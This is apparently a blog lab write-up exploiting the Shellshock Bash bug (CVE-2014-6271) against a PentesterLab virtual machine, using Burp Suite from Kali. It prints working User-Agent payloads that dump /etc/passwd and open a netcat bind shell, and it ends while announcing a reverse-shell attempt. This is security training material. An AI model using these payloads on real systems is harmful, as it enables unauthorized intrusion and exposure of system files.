How to Exploit the ShellShock/Bash Bug CVE-2014-6271 Vulnerability
The "Shellshock" or "Bash Bug" vulnerability was discovered on September 24, 2014. This vulnerability was assigned the CVE classifer CVE-2014-6271. According to NIST, "GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution" (https://nvd.nist.gov/vuln/detail/CVE-2014-6271).
To exploit this vulnerability, I used an infected virtual machine installed on a Hyper-V instance. The machine itself was downloaded from a lab in PentesterLab (https://pentesterlab.com). I also used a virtualized image of Kali Linux (see image below for version and OS details). Additional tools used were Burp Suite (which comes pre-installed on Kali, and the FoxyProxy addon module for FireFox (https://addons.mozilla.org/en-US/firefox/addon/foxyproxy-standard).
Once the vulnerable machine was installed on Hyper-V, my first step was to assign it a static IP address using the command sudo ifconfig eth0 192.168.1.5 netmask 255.255.255.0
To ensure the static IP was set, use the command ifconfig
I followed this by opening Burp Suite in Kali and bound the proxy listener to loopback only (127.0.0.1) and to listen on port 8181. Additionally, I disabled the interceptor as it was not needed to perform this exploit.
The next thing I did was setup FoxyProxy in the web browser with the local host address and port 8181. I named this proxy 'Adam's Proxy'. Once it was configured, I enabled all traffic to be routed through the proxy.
Next, I opened the Firefox web browser in my Kali instance and navigated to the vulnerable machine.
Since ShellShock/Bash Bug CVE-2014-6271 uses the CGI as the attack vector for this vulnerability, I sent this to the repeater to start manipulating parameters to see how I can begin exploiting the vulnerability.
To test for the ShellShock/Bash Bug CVE-2014-6271, I changed the User-Agent field to run the command ( ) { :;}; echo $(</etc/passwd) which returned the information in the passwd file.
I decided it would be much more interesting to open a shell to execute commands on the vulnerable machine. To do this, I changed the User-Agent to run the following command: ( ) { :;}; /usr/bin/nc -l -p 9999 -e /bin/sh
This command listens on the local machine over port 9999 for any connections.
As you can see, there were no errors returned. Next, I opened a netcat session on my local machine to listen to port 9999 on the vulnerable box. From here, I was able to execute commands and root the machine.
Next, I wanted to see if I could create a reverse shell. Since most machines in the wild will have some sort of firewall that block attackers from access over random ports, I am going to connect over known open posts used for web servers (80, 443).
Comments
Post a Comment